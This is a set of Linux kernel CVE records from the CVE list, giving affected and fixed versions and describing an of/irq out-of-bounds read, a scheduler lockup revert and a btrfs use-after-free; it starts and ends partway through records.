Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < b739dffa5d570b411d4bdf4bb9b8dfd6b7d72305 (git)

Linux

Affected: 2.6.18
Unaffected: 0 , < 2.6.18 (semver)
Unaffected: 4.19.322 , ≤ 4.19.* (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46743",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:49:43.804091Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:49:58.918Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:17:32.674Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/of/irq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d2a79494d8a5262949736fb2c3ac44d20a51b0d8",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            },
            {
              "lessThan": "defcaa426ba0bc89ffdafb799d2e50b52f74ffc4",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            },
            {
              "lessThan": "9d1e9f0876b03d74d44513a0ed3ed15ef8f2fed5",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            },
            {
              "lessThan": "baaf26723beab3a04da578d3008be3544f83758f",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            },
            {
              "lessThan": "8ff351ea12e918db1373b915c4c268815929cbe5",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            },
            {
              "lessThan": "7ead730af11ee7da107f16fc77995613c58d292d",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            },
            {
              "lessThan": "bf68acd840b6a5bfd3777e0d5aaa204db6b461a9",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            },
            {
              "lessThan": "b739dffa5d570b411d4bdf4bb9b8dfd6b7d72305",
              "status": "affected",
              "version": "cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/of/irq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.18"
            },
            {
              "lessThan": "2.6.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.322",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.322",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nof/irq: Prevent device address out-of-bounds read in interrupt map walk\n\nWhen of_irq_parse_raw() is invoked with a device address smaller than\nthe interrupt parent node (from #address-cells property), KASAN detects\nthe following out-of-bounds read when populating the initial match table\n(dyndbg=\"func of_irq_parse_* +p\"):\n\n  OF: of_irq_parse_one: dev=/soc@0/picasso/watchdog, index=0\n  OF:  parent=/soc@0/pci@878000000000/gpio0@17,0, intsize=2\n  OF:  intspec=4\n  OF: of_irq_parse_raw: ipar=/soc@0/pci@878000000000/gpio0@17,0, size=2\n  OF:  -\u003e addrsize=3\n  ==================================================================\n  BUG: KASAN: slab-out-of-bounds in of_irq_parse_raw+0x2b8/0x8d0\n  Read of size 4 at addr ffffff81beca5608 by task bash/764\n\n  CPU: 1 PID: 764 Comm: bash Tainted: G           O       6.1.67-484c613561-nokia_sm_arm64 #1\n  Hardware name: Unknown Unknown Product/Unknown Product, BIOS 2023.01-12.24.03-dirty 01/01/2023\n  Call trace:\n   dump_backtrace+0xdc/0x130\n   show_stack+0x1c/0x30\n   dump_stack_lvl+0x6c/0x84\n   print_report+0x150/0x448\n   kasan_report+0x98/0x140\n   __asan_load4+0x78/0xa0\n   of_irq_parse_raw+0x2b8/0x8d0\n   of_irq_parse_one+0x24c/0x270\n   parse_interrupts+0xc0/0x120\n   of_fwnode_add_links+0x100/0x2d0\n   fw_devlink_parse_fwtree+0x64/0xc0\n   device_add+0xb38/0xc30\n   of_device_add+0x64/0x90\n   of_platform_device_create_pdata+0xd0/0x170\n   of_platform_bus_create+0x244/0x600\n   of_platform_notify+0x1b0/0x254\n   blocking_notifier_call_chain+0x9c/0xd0\n   __of_changeset_entry_notify+0x1b8/0x230\n   __of_changeset_apply_notify+0x54/0xe4\n   of_overlay_fdt_apply+0xc04/0xd94\n   ...\n\n  The buggy address belongs to the object at ffffff81beca5600\n   which belongs to the cache kmalloc-128 of size 128\n  The buggy address is located 8 bytes inside of\n   128-byte region [ffffff81beca5600, ffffff81beca5680)\n\n  The buggy address belongs to the physical page:\n  page:00000000230d3d03 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1beca4\n  head:00000000230d3d03 order:1 compound_mapcount:0 compound_pincount:0\n  flags: 0x8000000000010200(slab|head|zone=2)\n  raw: 8000000000010200 0000000000000000 dead000000000122 ffffff810000c300\n  raw: 0000000000000000 0000000000200020 00000001ffffffff 0000000000000000\n  page dumped because: kasan: bad access detected\n\n  Memory state around the buggy address:\n   ffffff81beca5500: 04 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n   ffffff81beca5580: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n  \u003effffff81beca5600: 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n                        ^\n   ffffff81beca5680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n   ffffff81beca5700: 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc\n  ==================================================================\n  OF:  -\u003e got it !\n\nPrevent the out-of-bounds read by copying the device address into a\nbuffer of sufficient size."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:59.785Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d2a79494d8a5262949736fb2c3ac44d20a51b0d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/defcaa426ba0bc89ffdafb799d2e50b52f74ffc4"
        },
        {
          "url": "https://git.kernel.org/stable/c/9d1e9f0876b03d74d44513a0ed3ed15ef8f2fed5"
        },
        {
          "url": "https://git.kernel.org/stable/c/baaf26723beab3a04da578d3008be3544f83758f"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ff351ea12e918db1373b915c4c268815929cbe5"
        },
        {
          "url": "https://git.kernel.org/stable/c/7ead730af11ee7da107f16fc77995613c58d292d"
        },
        {
          "url": "https://git.kernel.org/stable/c/bf68acd840b6a5bfd3777e0d5aaa204db6b461a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/b739dffa5d570b411d4bdf4bb9b8dfd6b7d72305"
        }
      ],
      "title": "of/irq: Prevent device address out-of-bounds read in interrupt map walk",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46743",
    "datePublished": "2024-09-18T07:12:04.166Z",
    "dateReserved": "2024-09-11T15:12:18.264Z",
    "dateUpdated": "2026-01-05T10:52:59.785Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42245 (GCVE-0-2024-42245)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2025-11-03 22:02

Title

Revert "sched/fair: Make sure to try to detach at least one movable task"

Summary

In the Linux kernel, the following vulnerability has been resolved: Revert "sched/fair: Make sure to try to detach at least one movable task" This reverts commit b0defa7ae03ecf91b8bfd10ede430cff12fcbd06. b0defa7ae03ec changed the load balancing logic to ignore env.max_loop if all tasks examined to that point were pinned. The goal of the patch was to make it more likely to be able to detach a task buried in a long list of pinned tasks. However, this has the unfortunate side effect of creating an O(n) iteration in detach_tasks(), as we now must fully iterate every task on a cpu if all or most are pinned. Since this load balance code is done with rq lock held, and often in softirq context, it is very easy to trigger hard lockups. We observed such hard lockups with a user who affined O(10k) threads to a single cpu. When I discussed this with Vincent he initially suggested that we keep the limit on the number of tasks to detach, but increase the number of tasks we can search. However, after some back and forth on the mailing list, he recommended we instead revert the original patch, as it seems likely no one was actually getting hit by the original issue.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d467194018dd536fe…
	https://git.kernel.org/stable/c/1e116c18e32b035a2…
	https://git.kernel.org/stable/c/0fa6dcbfa2e2b97c1…
	https://git.kernel.org/stable/c/2feab2492deb2f14f…

Impacted products

Vendor

Product

Version

Linux

Affected: b0defa7ae03ecf91b8bfd10ede430cff12fcbd06 , < d467194018dd536fe6c65a2fd3aedfcdb1424903 (git)
Affected: b0defa7ae03ecf91b8bfd10ede430cff12fcbd06 , < 1e116c18e32b035a2d1bd460800072c8bf96bc44 (git)
Affected: b0defa7ae03ecf91b8bfd10ede430cff12fcbd06 , < 0fa6dcbfa2e2b97c1e6febbea561badf0931a38b (git)
Affected: b0defa7ae03ecf91b8bfd10ede430cff12fcbd06 , < 2feab2492deb2f14f9675dd6388e9e2bf669c27a (git)

Linux

Affected: 6.1
Unaffected: 0 , < 6.1 (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42245",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:13:35.095987Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:31.221Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:45.175Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/sched/fair.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d467194018dd536fe6c65a2fd3aedfcdb1424903",
              "status": "affected",
              "version": "b0defa7ae03ecf91b8bfd10ede430cff12fcbd06",
              "versionType": "git"
            },
            {
              "lessThan": "1e116c18e32b035a2d1bd460800072c8bf96bc44",
              "status": "affected",
              "version": "b0defa7ae03ecf91b8bfd10ede430cff12fcbd06",
              "versionType": "git"
            },
            {
              "lessThan": "0fa6dcbfa2e2b97c1e6febbea561badf0931a38b",
              "status": "affected",
              "version": "b0defa7ae03ecf91b8bfd10ede430cff12fcbd06",
              "versionType": "git"
            },
            {
              "lessThan": "2feab2492deb2f14f9675dd6388e9e2bf669c27a",
              "status": "affected",
              "version": "b0defa7ae03ecf91b8bfd10ede430cff12fcbd06",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/sched/fair.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.1"
            },
            {
              "lessThan": "6.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"sched/fair: Make sure to try to detach at least one movable task\"\n\nThis reverts commit b0defa7ae03ecf91b8bfd10ede430cff12fcbd06.\n\nb0defa7ae03ec changed the load balancing logic to ignore env.max_loop if\nall tasks examined to that point were pinned. The goal of the patch was\nto make it more likely to be able to detach a task buried in a long list\nof pinned tasks. However, this has the unfortunate side effect of\ncreating an O(n) iteration in detach_tasks(), as we now must fully\niterate every task on a cpu if all or most are pinned. Since this load\nbalance code is done with rq lock held, and often in softirq context, it\nis very easy to trigger hard lockups. We observed such hard lockups with\na user who affined O(10k) threads to a single cpu.\n\nWhen I discussed this with Vincent he initially suggested that we keep\nthe limit on the number of tasks to detach, but increase the number of\ntasks we can search. However, after some back and forth on the mailing\nlist, he recommended we instead revert the original patch, as it seems\nlikely no one was actually getting hit by the original issue."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:58.655Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d467194018dd536fe6c65a2fd3aedfcdb1424903"
        },
        {
          "url": "https://git.kernel.org/stable/c/1e116c18e32b035a2d1bd460800072c8bf96bc44"
        },
        {
          "url": "https://git.kernel.org/stable/c/0fa6dcbfa2e2b97c1e6febbea561badf0931a38b"
        },
        {
          "url": "https://git.kernel.org/stable/c/2feab2492deb2f14f9675dd6388e9e2bf669c27a"
        }
      ],
      "title": "Revert \"sched/fair: Make sure to try to detach at least one movable task\"",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42245",
    "datePublished": "2024-08-07T15:14:31.019Z",
    "dateReserved": "2024-07-30T07:40:12.254Z",
    "dateUpdated": "2025-11-03T22:02:45.175Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-48733 (GCVE-0-2022-48733)

Vulnerability from cvelistv5 – Published: 2024-06-20 11:13 – Updated: 2025-12-23 13:20

Title

btrfs: fix use-after-free after failure to create a snapshot

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: fix use-after-free after failure to create a snapshot At ioctl.c:create_snapshot(), we allocate a pending snapshot structure and then attach it to the transaction's list of pending snapshots. After that we call btrfs_commit_transaction(), and if that returns an error we jump to 'fail' label, where we kfree() the pending snapshot structure. This can result in a later use-after-free of the pending snapshot: 1) We allocated the pending snapshot and added it to the transaction's list of pending snapshots; 2) We call btrfs_commit_transaction(), and it fails either at the first call to btrfs_run_delayed_refs() or btrfs_start_dirty_block_groups(). In both cases, we don't abort the transaction and we release our transaction handle. We jump to the 'fail' label and free the pending snapshot structure. We return with the pending snapshot still in the transaction's list; 3) Another task commits the transaction. This time there's no error at all, and then during the transaction commit it accesses a pointer to the pending snapshot structure that the snapshot creation task has already freed, resulting in a user-after-free. This issue could actually be detected by smatch, which produced the following warning: fs/btrfs/ioctl.c:843 create_snapshot() warn: '&pending_snapshot->list' not removed from list So fix this by not having the snapshot creation ioctl directly add the pending snapshot to the transaction's list. Instead add the pending snapshot to the transaction handle, and then at btrfs_commit_transaction() we add the snapshot to the list only when we can guarantee that any error returned after that point will result in a transaction abort, in which case the ioctl code can safely free the pending snapshot and no one can access it anymore.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7e4c72dbaf62f8978…
	https://git.kernel.org/stable/c/a7b717fa15165d3d9…
	https://git.kernel.org/stable/c/9372fa1d73da5f167…
	https://git.kernel.org/stable/c/28b21c558a3753171…

Impacted products

Vendor

Product

Version

Linux

Affected: c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < 7e4c72dbaf62f8978af8321a24dbd35566d3a78a (git)
Affected: c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < a7b717fa15165d3d9245614680bebc48a52ac05d (git)
Affected: c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < 9372fa1d73da5f1673921e365d0cd2c27ec7adc2 (git)
Affected: c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < 28b21c558a3753171097193b6f6602a94169093a (git)

Linux

Affected: 3.7
Unaffected: 0 , < 3.7 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.22 , ≤ 5.15.* (semver)
Unaffected: 5.16.8 , ≤ 5.16.* (semver)
Unaffected: 5.17 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:46:47.137Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a7b717fa15165d3d9245614680bebc48a52ac05d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9372fa1d73da5f1673921e365d0cd2c27ec7adc2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/28b21c558a3753171097193b6f6602a94169093a"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-48733",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:10:54.149503Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:48.869Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/ioctl.c",
            "fs/btrfs/transaction.c",
            "fs/btrfs/transaction.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7e4c72dbaf62f8978af8321a24dbd35566d3a78a",
              "status": "affected",
              "version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
              "versionType": "git"
            },
            {
              "lessThan": "a7b717fa15165d3d9245614680bebc48a52ac05d",
              "status": "affected",
              "version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
              "versionType": "git"
            },
            {
              "lessThan": "9372fa1d73da5f1673921e365d0cd2c27ec7adc2",
              "status": "affected",
              "version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
              "versionType": "git"
            },
            {
              "lessThan": "28b21c558a3753171097193b6f6602a94169093a",
              "status": "affected",
              "version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/ioctl.c",
            "fs/btrfs/transaction.c",
            "fs/btrfs/transaction.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.7"
            },
            {
              "lessThan": "3.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.22",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.16.*",
              "status": "unaffected",
              "version": "5.16.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.17",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.22",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16.8",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.17",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix use-after-free after failure to create a snapshot\n\nAt ioctl.c:create_snapshot(), we allocate a pending snapshot structure and\nthen attach it to the transaction\u0027s list of pending snapshots. After that\nwe call btrfs_commit_transaction(), and if that returns an error we jump\nto \u0027fail\u0027 label, where we kfree() the pending snapshot structure. This can\nresult in a later use-after-free of the pending snapshot:\n\n1) We allocated the pending snapshot and added it to the transaction\u0027s\n   list of pending snapshots;\n\n2) We call btrfs_commit_transaction(), and it fails either at the first\n   call to btrfs_run_delayed_refs() or btrfs_start_dirty_block_groups().\n   In both cases, we don\u0027t abort the transaction and we release our\n   transaction handle. We jump to the \u0027fail\u0027 label and free the pending\n   snapshot structure. We return with the pending snapshot still in the\n   transaction\u0027s list;\n\n3) Another task commits the transaction. This time there\u0027s no error at\n   all, and then during the transaction commit it accesses a pointer\n   to the pending snapshot structure that the snapshot creation task\n   has already freed, resulting in a user-after-free.\n\nThis issue could actually be detected by smatch, which produced the\nfollowing warning:\n\n  fs/btrfs/ioctl.c:843 create_snapshot() warn: \u0027\u0026pending_snapshot-\u003elist\u0027 not removed from list\n\nSo fix this by not having the snapshot creation ioctl directly add the\npending snapshot to the transaction\u0027s list. Instead add the pending\nsnapshot to the transaction handle, and then at btrfs_commit_transaction()\nwe add the snapshot to the list only when we can guarantee that any error\nreturned after that point will result in a transaction abort, in which\ncase the ioctl code can safely free the pending snapshot and no one can\naccess it anymore."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-23T13:20:07.583Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7e4c72dbaf62f8978af8321a24dbd35566d3a78a"
        },
        {
          "url": "https://git.kernel.org/stable/c/a7b717fa15165d3d9245614680bebc48a52ac05d"
        },
        {
          "url": "https://git.kernel.org/stable/c/9372fa1d73da5f1673921e365d0cd2c27ec7adc2"
        },
        {
          "url": "https://git.kernel.org/stable/c/28b21c558a3753171097193b6f6602a94169093a"
        }
      ],
      "title": "btrfs: fix use-after-free after failure to create a snapshot",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2022-48733",
    "datePublished": "2024-06-20T11:13:20.737Z",
    "dateReserved": "2024-06-20T11:09:39.053Z",
    "dateUpdated": "2025-12-23T13:20:07.583Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43871 (GCVE-0-2024-43871)

Vulnerability from cvelistv5 – Published: 2024-08-21 00:06 – Updated: 2025-11-03 22:06

Title

devres: Fix memory leakage caused by driver API devm_free_percpu()

Summary

